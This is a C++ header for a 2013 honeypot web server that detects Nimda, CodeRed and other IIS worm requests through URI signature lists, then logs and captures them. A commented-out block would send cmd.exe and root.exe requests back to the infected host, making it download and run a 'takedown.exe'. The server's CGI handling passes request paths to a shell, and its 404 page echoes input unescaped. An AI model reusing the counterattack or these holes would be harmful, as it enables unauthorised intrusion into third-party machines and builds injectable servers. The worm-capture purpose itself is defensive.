#ifndef _wormd
#define _wormd

/*

WORM HTTPD V1.0.0

Worm HTTPD is a web server for BSD and Linux.

The server captures worm speciminids and can respond to 
detected worm attacks.

Author: Matthew William Coan
Date: Wed May 22 14:36:37 EDT 2013

*/

#include <iostream>
#include <fstream>
#include <string>
#include <list>
#include <vector>
#include <map>
#include <sstream>
#include <cctype>

#include <sys/types.h>
#include <sys/stat.h>
#include <signal.h>

#include "tcp_stream.h"
#include "tcp_server.h"
#include "lock_file.h"

#include "config.h"

namespace worm {

using namespace std;
using namespace net_tools;
using namespace file_tools;

typedef vector< string > string_vector_type;
typedef map< string, LockFile* > lock_map_type;

int fork_count = 0;

string
escape(const string & str)
{
   string ret;
   string temp;
   for(size_t i = 0; i < str.size(); i++) {
      stringstream st;
      st << "%" << hex << str[i];
      st >> temp;
      ret += temp;
   }
   return ret;
}

int
System(const string & cmd)
{
//   return system(cmd.c_str());
   int rc;
   FILE * prog = popen(cmd.c_str(), "r");
   if(prog != NULL) {
      char ch = fgetc(prog);
      cout << ch;
      pclose(prog); 
      rc = 0;
   }
   else {
      rc = 1;
   }
   cout << flush;
   return rc;
}

void 
on_SIGALRM(int arg)
{
   cout << "timeout..." << endl;
   exit(0);
}

void
on_SIGCHLD(int arg)
{
   fork_count--;
}

string 
trim(const string & str) 
{
   string ret;
   for(size_t i = 0; i < str.size(); i++) {
      if(str[i] != '\n' && str[i] != '\r') {
         ret += str[i];
      }
   }
   return ret;
}

class http_request {
   string_vector_type header_vec;
   string uri;
   string user_agent;
   string qs;
   string ip;
   string method;
   int content_length;

public:
   http_request(const string_vector_type & vec) 
   : header_vec(vec) { 
      content_length = 0; 
      for(size_t i = 1; i < header_vec.size(); i++) {
         for(size_t j = 0; j < header_vec[i].size(); j++) {
            if(header_vec[i][j] == ':') 
               break;
            header_vec[i][j] = tolower(header_vec[i][j]);
         }       
      }
   }
   ~http_request() { }
   void write_headers(ofstream & out) {
      for(size_t i = 0; i < header_vec.size(); i++) {
         out << header_vec[i] << "\r\n";
      }
      out << "\r\n" << flush;
   }
   string & get(size_t i) { return header_vec[i]; }
   size_t size() { return header_vec.size(); }
   bool is_get() {
      bool ret = false;
      if(header_vec.size()) {
         if(header_vec[0].find("GET ") == 0) {
            ret = true;
         }
      }
      return ret;
   }
   bool is_post() {
      bool ret = false;
      if(header_vec.size()) {
         if(header_vec[0].find("POST ") == 0) {
            ret = true;
         }
      }
      return ret;
   }
   const string & get_method() { return method; }
   const string & get_uri() { return uri; }
   const string & get_user_agent() { return user_agent; }
   const string & get_query_string() { return qs; }
   const string get_qs(const string & head) {
      string ret;
      if(head.find("GET /") == string::npos && head.find("POST /") == string::npos) {
         uri = "/";
         qs = "";
      }
      else {
         size_t p = head.find(" ");
         if(p != string::npos) {
            p++;
            if(p < head.size()) {
               bool found = false;
               while(head[p] != ' ') {
                  if(head[p] == '?')  
                     found = true; 
                  else if(found)
                     qs += head[p]; 
                  else
                     uri += head[p];
                  p++;
                  if(p >= head.size()) break;
               }
            }
         }
      }
      return qs;
   }
   void parse() {
      if(header_vec.size()) {
         if(header_vec[0].find("POST ") != string::npos) {
            method = "POST";
         }
         else if(header_vec[0].find("GET ") != string::npos) {
            method = "GET";
         }
         else {
            method = "GET";
         }
         qs = get_qs(header_vec[0]);
         for(size_t i = 1; i < header_vec.size(); i++) {
            if(header_vec[i].find("user-agent: ") != string::npos) {
               user_agent = trim(header_vec[i].substr(12));
            }
            else if(header_vec[i].find("content-length: ") != string::npos) {
               string temp = header_vec[i].substr(16);
               content_length = atoi(temp.c_str());
            }
         }
      }
   }
   const string & get_ip() { return ip; }
   string get_cgi_path() {
      string ret = get_uri();
      if(ret.find("/cgi-bin/") == 0) {
         ret = ret.substr(9);
      }
      return ret;
   }

   int get_content_length() {
      return content_length;
   }
};

class worm_httpd {
   tcp_server svr;
   string me;
   lock_map_type lock_map;
   int lock_count;

public:
   worm_httpd(const string & host, int port) 
   :svr(host.c_str(), port) {
      me = host;
      lock_count = 0;
      System("rm -f lock/*.lock");
   }

   ~worm_httpd() {
      svr.close();
      for(lock_map_type::iterator p = lock_map.begin(); p != lock_map.end(); p++) {
         delete p->second;
      }
      lock_map.clear();
   }

   string read_line(tcp_stream & tcp) {
      string ret;
      char ch;
      ch = tcp.get();
      while(tcp) {
         ret += ch;
         if(ret.size() >= MAX_LINE) break;
         if(ch == '\n') break;
         ch = tcp.get();
      }
      return ret;
   }

   http_request* read_request(tcp_stream & tcp)  {
      string line;
      string_vector_type vec;
      line = read_line(tcp);
      int n = 0;
      while(tcp) {
         if(n >= MAX_HEADERS) break;
         n++;
         if(line == "\r\n") break;
         vec.push_back(line);
         line = read_line(tcp);
      }
      http_request * req = new http_request(vec);
      req->parse();
      return req;
   }

   bool is_alpha(char ch) {
      bool ret = false;
      if((ch >= 'a' && ch <= 'z') || (ch >= 'A' && ch <= 'Z'))
         ret = true;
      return ret; 
   }

   bool is_digit(char ch) {
      bool ret = false;
      if(ch >= '0' && ch <= '9')
         ret = true;
      return ret;
   }

   string secure(const string & secure) {
      string ret;
      for(size_t i = 0; i < secure.size(); i++) {
         if(secure[i] == '/' 
            || is_alpha(secure[i]) 
            || is_digit(secure[i])
            || secure[i] == '_' 
            || secure[i] == '+' 
            || secure[i] == '-') {
            ret += secure[i];
         }
         else if(secure[i] == '.') {
            if(i+1 < secure.size()) {
               if(secure[i+1] == '.') {
                  break;
               }
            }
            ret += secure[i];
         }
      }
      return ret;
   }

   void capture_worm(tcp_stream & tcp, http_request * req, const string & worm_name, const string & ip) {
      fork_count++;
      if(fork() == 0) {
         string worm_file = string(CAPTURE_DIR) + string(ip) + string("_") + worm_name + string(".dat");
         ofstream fout(worm_file.c_str(), ios::out | ios::ate | ios::trunc | ios::binary);
         if(fout) {
            signal(SIGALRM, on_SIGALRM);
            alarm(TIMEOUT);
            req->write_headers(fout);
            char ch = tcp.get();
            int count = 0;
            while(tcp) {
               fout.write(&ch, 1);
               if((count % 100) == 0)
                  fout.flush();
               count++;
               ch = tcp.get();
            }
            fout.flush();
            fout.close();
            alarm(0);
         }
         exit(0);
      }
   }

   string get_next_lock_file() {
      enum { MAX = 1024 };
      char buffer[MAX];
      sprintf(buffer, "%s/lock/%d.lock", HOME_DIR, lock_count);
      lock_count++;
      ofstream fout(buffer, ios::out | ios::trunc | ios::ate);
      if(fout) fout.close();
      chmod(buffer, S_IRUSR | S_IWUSR | S_IXUSR);
      return string(buffer);
   }        

   void process_cgi_post_request(tcp_stream & tcp, http_request * req) {
      tcp << "HTTP/1.0 200 OK\r\n";
      const char * ip = inet_ntoa(svr.get_addr()->sin_addr);
      size_t sz = strlen("REQUEST_METHOD=POST");
      char * buffer = new char [sz+1];
      strcpy(buffer, "REQUEST_METHOD=POST");
      putenv(buffer);
      size_t sz2 = strlen("CONTENT_LENGTH=") + 100;
      char * buffer2 = new char [sz2+1];
      sprintf(buffer2, "CONTENT_LENGTH=%d", req->get_content_length());
      putenv(buffer2);
      int length = req->get_content_length();
      struct stat st;
      string file = string(CGIBIN) + req->get_cgi_path();
      if(stat(file.c_str(), &st) == 0) {
         LockFile * lock_ptr = lock_map[req->get_cgi_path()];
         if(lock_ptr == 0) {
            string temp = get_next_lock_file();
            lock_ptr = new LockFile(temp);
            lock_map[req->get_cgi_path()] = lock_ptr;
         }

         lock_ptr->write_lock();
        
         ofstream fout("post_data.txt", ios::out | ios::ate | ios::trunc);
         if(fout && length > 0 && length <= MAX_LINE) {
            char * buffer = new char[length+1];
            memset(buffer, length+1, 0);
            alarm(TIMEOUT);
            tcp.read(buffer, length);
            alarm(0);
            fout.write(buffer, length);
            delete [] buffer;
            fout.flush();
            fout.close();
         }
         if(System(string("cat post_data.txt | ") + string(CGIBIN) 
                   + req->get_cgi_path() + string(" > temp.txt")) != 0) {

         }

         lock_ptr->write_unlock();
      }
      else {
         capture_worm(tcp, req, "Unknown", ip);
      }
      delete [] buffer2;
      delete [] buffer;
      ifstream fin("temp.txt", ios::in);
      if(fin) {
         char ch;
         ch = fin.get();
         while(fin) {
            tcp << ch;
            ch = fin.get();
         }
         fin.close();
      }
      tcp.close();
   }

   void process_cgi_get_request(tcp_stream & tcp, http_request * req) {
      tcp << "HTTP/1.0 200 OK\r\n";
      const char * ip = inet_ntoa(svr.get_addr()->sin_addr);
      size_t sz = strlen("REQUEST_METHOD=GET");
      char * buffer = new char [sz+1];
      strcpy(buffer, "REQUEST_METHOD=GET");
      putenv(buffer);
      string temp = string("QUERY_STRING=") + req->get_query_string();
      char * buffer2 = new char [temp.size()+1];
      strcpy(buffer2, temp.c_str());
      putenv(buffer2);
      string file = string(CGIBIN) + req->get_cgi_path();
      struct stat st;
      if(stat(file.c_str(), &st) == 0) {
         LockFile * lock_ptr = lock_map[req->get_cgi_path()];
         if(lock_ptr == 0) {
            string temp = get_next_lock_file();
            lock_ptr = new LockFile(temp);
            lock_map[req->get_cgi_path()] = lock_ptr;
         }

         lock_ptr->write_lock();

         if(System(string(CGIBIN) + req->get_cgi_path() + string(" > temp.txt")) != 0) {
            capture_worm(tcp, req, "Unknown", ip);
         }

         lock_ptr->write_unlock();
      }
      else {
         capture_worm(tcp, req, "Unknown", ip);
      }
      delete [] buffer2;
      delete [] buffer;
      ifstream fin("temp.txt", ios::in);
      if(fin) {
         char ch;
         ch = fin.get();
         while(fin) {
            tcp << ch;
            ch = fin.get();
         }
         fin.close();
      }
      tcp.close();
   }

   void process_request(tcp_stream & tcp, http_request * req) {
      //const char * ip = inet_ntoa(svr.get_addr()->sin_addr);
      tcp << "HTTP/1.0 200 OK\r\n";
      string file = string(HTDOCS) + secure(req->get_uri());
      if(req->get_uri() == "/") 
         file += "index.html";
      ifstream fin(file.c_str(), ios::in);
      if(fin) {
         char ch;
         ch = fin.get();
         file = "";
         while(fin) {
            file += ch;
            if(file.size() > 1024 * 1024 * 10) break;
            ch = fin.get();
         }
         fin.close();
         tcp << "Content-type: text/html\r\n";
         tcp << "Content-length: " << (int)file.size() << "\r\n\r\n";
         tcp << file;
      }
      else {
         const char * ip = inet_ntoa(svr.get_addr()->sin_addr);
         capture_worm(tcp, req, "Unknown", ip);
         tcp << "Content-type: text/html\r\n"
             << "\r\n"
             << "<HTML>\n"
             << "<HEAD>\n"
             << "<TITLE>\n"
             << "404 File Not Found\n"
             << "</TITLE>\n"
             << "</HEAD>\n"
             << "<BODY BGCOLOR=\"WHITE\">\n"
             << "<H1>404 File Not Found</H1>\n"
             << "IP Address = " << ip << "<BR>\n"
             << "URI = " << req->get_uri() << "<BR>\n"
             << "QUERY STRING = " << req->get_query_string() << "<BR>\n"
             << "</BODY>\n"
             << "</HTML>\n";
      }
      tcp.close();
   }

   void process_worm_request(tcp_stream & tcp, http_request * req, const string & worm_name) {
      const char * ip = inet_ntoa(svr.get_addr()->sin_addr);
      capture_worm(tcp, req, worm_name, ip);
/*
      fork_count++;
      if(fork() == 0) {
         string worm_file = string(CAPTURE_DIR) + string(ip) + string("_") + worm_name + string(".dat");
         ofstream fout(worm_file.c_str(), ios::out | ios::ate | ios::trunc | ios::binary);
         if(fout) {
            signal(SIGALRM, on_SIGALRM);
            alarm(TIMEOUT);
            req->write_headers(fout);
            char ch = tcp.get();
            int count = 0;
            while(tcp) {
               fout.write(&ch, 1);
               if((count % 100) == 0)
                  fout.flush();
               count++;
               ch = tcp.get();
            }
            fout.flush();
            fout.close();
            alarm(0);
         }
         exit(0);
      }
*/

      tcp << "HTTP/1.0 200 OK\r\n"
          << "Content-type: text/html\r\n\r\n"
          << "<HTML><HEAD>\n"
          << "<TITLE>worm capture</TITLE></HEAD>\n"
          << "<BODY BGCOLOR=\"WHITE\">\n"
          << "<H1>You could be a worm...</H1>\n"
          << "IP Address = " << ip << "<BR>\n"
          << "URI = " << req->get_uri() << "<BR>\n"
          << "QUERY STRING = " << req->get_query_string() << "<BR>\n"
          << "</BODY>\n"
          << "</HTML>\n";
      tcp.close();
      me = ME_HOST;
/*
      if(worm_name == "Nimda") {
         signal(SIGALRM, on_SIGALRM);
         alarm(EXPLOIT_TIMEOUT);
         tcp_stream tcp2(ip, 80);
         if(tcp2) {
            tcp2 << "GET /scripts/cmd.exe?/c+COPY+%5F%5F" << me
                 << "%5Fmy_software%5Ftakedown.exe+takedown.exe HTTP/1.0\r\n\r\n";
            while(tcp2) tcp2.get();
            tcp2.close();
            tcp_stream tcp3(ip, 80);
            if(tcp3) {
               tcp3 << "GET /scripts/cmd.exe?/c+takedown.exe HTTP/1.0\r\n\r\n";
               while(tcp3) tcp3.get();
               tcp3.close();
            }
         }
         alarm(0);
      }
      else if(worm_name == "CodeRed") {
         signal(SIGALRM, on_SIGALRM);
         alarm(EXPLOIT_TIMEOUT);
         tcp_stream tcp2(ip, 80);
         if(tcp2) {
            tcp2 << "GET /scripts/root.exe?/c+COPY+" <<  "\\\\" << me 
                 << "\\my_software\\takedown.exe+takedown.exe HTTP/1.0\r\n\r\n";
            while(tcp2) tcp2.get();
            tcp2.close();
            tcp_stream tcp3(ip, 80);
            if(tcp3) {
               tcp3 << "GET /scripts/root.exe?/c+takedown.exe HTTP/1.0\r\n\r\n";
               while(tcp3) tcp3.get();
               tcp3.close();
            }
         }
         alarm(0);
      }
*/
   }


   bool is_robot(http_request * request, string & bot_name) {
      bool ret = false;
      if(request->get_uri() == "/robots.txt") {
         bot_name = request->get_user_agent();
         char * ptr = strstr(bot_name.c_str(), "compatible; ");
         if(ptr != NULL) {
            ptr += 12;
            string temp;
            while(*ptr && *ptr != ';') {
               temp += *ptr; 
               ptr++;
            }
            bot_name = temp;
         }
         ret = true;
      }
      return ret;
   }

   bool is_cgi(http_request * request) {
      bool ret = false;
      if(request->get_uri().find(".cgi") != string::npos)
         ret = true;
      return ret;
   }

   bool is_worm(http_request * request, string & worm_name) {
      bool ret = false;
      string qs = request->get_uri() + "?" + request->get_query_string();
      if(qs.find("cmd.exe") != string::npos
         || qs.find("tftp") != string::npos
         || qs.find("dir") != string::npos) {
         ret = true;
         worm_name = "Nimda";
      }
      else if(   qs.find(".ida?AAA") != string::npos
              || qs.find(".ida?NNN") != string::npos
              || qs.find(".ida?XXX") != string::npos
              || qs.find(".idq?AAA") != string::npos
              || qs.find(".idq?NNN") != string::npos
              || qs.find(".idq?XXX") != string::npos) {
         ret = true;
         worm_name = "CodeRed";
      }
      else if(qs.find("phpMyAdmin") != string::npos) {
         worm_name = "hookworm.php";
         ret = true;
      }
      else if(qs.find("This-is-CRclean") != string::npos) {
         worm_name = "CRclean";
         ret = true;
      }
      else if(qs.find("Code_Green") != string::npos) {
         worm_name = "CodeGreen";
         ret = true;
      }
      else if(qs.find("!!!.htr") != string::npos
              || qs.find("/AAA") != string::npos
              || qs.find("lfsofmTS!") != string::npos
              || qs.find("i!xtpdlTS!") != string::npos) {
         worm_name = "IIS.Worm";
         ret = true;
      }
      else if(qs.find("root.exe") != string::npos) {
         worm_name = "CodeRed";
         ret = true;
      }
      else if(qs.find("nsiislog.dll") != string::npos) {
         worm_name = "DLL Worm";
         ret = true;
      }
      else if(qs.find("fp30reg.dll") != string::npos) {
         worm_name = "Front Page IIS Hole";
         ret = true;
      }
      return ret;
   }

   void log_request(http_request * request, 
                    const string & worm_name = "",
                    const string & bot_name = "") {
      for(size_t i = 0; i < request->size(); i++) {
         cout << "REQUEST: " << request->get(i);
      }
      ofstream fout(LOG_FILE, ios::app | ios::out);
      const char * ip = inet_ntoa(svr.get_addr()->sin_addr);
      time_t t = time(NULL);
      fout << "\"" << ip << "\",\"" << request->get_uri() << "\",\"" 
           << request->get_query_string() << "\",\""
           << request->get_user_agent() << "\",\"" << trim(ctime(&t)) << "\",\"" 
           << worm_name << "\",\"" << bot_name << "\",\"" << request->get_method() << "\"" << endl << flush;
      fout.close();
   }

   void say_text(const string & text) {
/*
      tcp_stream tout(NOTIFY_HOST, NOTIFY_PORT);
      if(tout) {
         tout << text << "\n";
         tout.close();
      }
*/
   }

   void on_worm(tcp_stream & tcp, http_request * request, string & worm_name) {
      say_text("worm!");
      cout << "worm..." << endl;
      log_request(request, worm_name);
      process_worm_request(tcp,request,worm_name);
   }

   void on_robot(tcp_stream & tcp, http_request * request, string & bot_name) {
      say_text("robot!");
      cout << "robot..." << endl;
      log_request(request, "", bot_name);
      process_request(tcp,request);
   }

   void on_cgi_get(tcp_stream & tcp, http_request * request) {
      cout << "cgi get..." << endl;
      log_request(request);
      process_cgi_get_request(tcp,request);
   }

   void on_cgi_post(tcp_stream & tcp, http_request * request) {
      cout << "cgi get..." << endl;
      log_request(request);
      process_cgi_post_request(tcp,request);
   }

   void on_cgi(tcp_stream & tcp, http_request * request) {
      say_text("common gateway interface");
      if(request->is_get()) {
         on_cgi_get(tcp,request);
      }
      else if(request->is_post()) {
         on_cgi_post(tcp,request);
      }
   }

   void on_file(tcp_stream & tcp, http_request * request) {
      say_text("request!");
      cout << "request..." << endl;
      log_request(request);
      process_request(tcp,request);
   }


   void run() {
      cout << ">>>worm_httpd: " << VERSION << endl;
      cout << "Author: Matthew W. Coan" << endl;
      cout << "eMail: mcoan@slack.net" << endl;
      cout << "WWW: http://slack.net/~mcoan/" << endl << endl;

      http_request * request;
      bool running = true;
      int fd;
      signal(SIGCHLD, on_SIGCHLD);
      while(running) {
         fd = svr.accept();
         if(fd <= 0) {
            cerr << "error..." << endl;
            break;
         }
         tcp_stream tcp(fd);
         cout << "accept..." << endl;
         if(fork_count >= MAX_FORK) {
            tcp.close();
            continue;
         }
         fork_count++;
         if(fork() == 0) {
            string name;
            signal(SIGALRM, on_SIGALRM);
            alarm(TIMEOUT);
            request = read_request(tcp);
            if(request) {
               if(is_worm(request, name)) 
                  on_worm(tcp, request, name);
               else if(is_robot(request, name))
                  on_robot(tcp, request, name);
               else if(is_cgi(request)) 
                  on_cgi(tcp, request);
               else 
                  on_file(tcp, request);
               delete request;
            }
            alarm(0);
            exit(0);
         }
      }
   }

   void shutdown() {
      svr.close();
   }
};

}

#endif /* _wormd */
